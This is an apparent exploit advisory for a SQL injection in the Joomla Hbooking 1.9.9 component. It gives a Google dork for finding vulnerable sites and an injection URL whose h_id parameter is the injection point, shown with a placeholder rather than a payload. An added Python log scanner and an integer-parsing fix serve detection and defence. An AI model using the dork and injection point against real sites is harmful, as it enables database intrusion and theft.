
# # # # #
# Exploit Title: Joomla! Component Hbooking 1.9.9 - SQL Injection
# Google Dork: inurl:index.php?option=com_hbooking
# Date: 13.02.2017
# Vendor Homepage: http://www.joomlaextension.biz/
# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/hbooking/
# Demo: http://www.joomlaextension.biz/demo/
# Version: 1.9.9
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_hbooking&view=roomlisting&temp=hotel&h_id=[SQL]
# # # # #
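Added detection example, not part of the advisory above: the injectable parameter is h_id on the com_hbooking roomlisting view, and a room/hotel id should only ever be an integer, so a log review can flag any com_hbooking request whose h_id is not purely numeric. The log lines are constructed samples in Apache common-log format (an assumption about the site's logging), not real traffic.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not real traffic). The second request
# carries a stray quote in h_id, the typical first probe against this parameter.
SAMPLE_LOG = """\
203.0.113.5 - - [13/Feb/2017:10:01:02 +0000] "GET /index.php?option=com_hbooking&view=roomlisting&temp=hotel&h_id=12 HTTP/1.1" 200 5120
203.0.113.9 - - [13/Feb/2017:10:01:07 +0000] "GET /index.php?option=com_hbooking&view=roomlisting&temp=hotel&h_id=12%27 HTTP/1.1" 200 5120
198.51.100.2 - - [13/Feb/2017:10:02:00 +0000] "GET /index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 2048
"""

# Common-log-format prefix: client IP, identity, user, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def suspicious_hbooking_requests(log_text):
    """Return (client_ip, decoded h_id) for every com_hbooking request whose
    h_id is not a plain integer. Other components and well-formed ids are ignored."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a recognised access-log line
        # parse_qs percent-decodes values, so %27 becomes a literal quote here.
        qs = parse_qs(urlsplit(m.group('target')).query, keep_blank_values=True)
        if qs.get('option') != ['com_hbooking']:
            continue  # only the vulnerable component is of interest
        for value in qs.get('h_id', []):
            if not value.isdigit():
                hits.append((m.group('ip'), value))
    return hits


if __name__ == '__main__':
    for ip, h_id in suspicious_hbooking_requests(SAMPLE_LOG):
        print(f'{ip} sent non-numeric h_id: {h_id!r}')
```

The same rule is the server-side fix: the component should read the parameter as an integer (in Joomla, JInput's getInt('h_id')) instead of concatenating the raw string into the query.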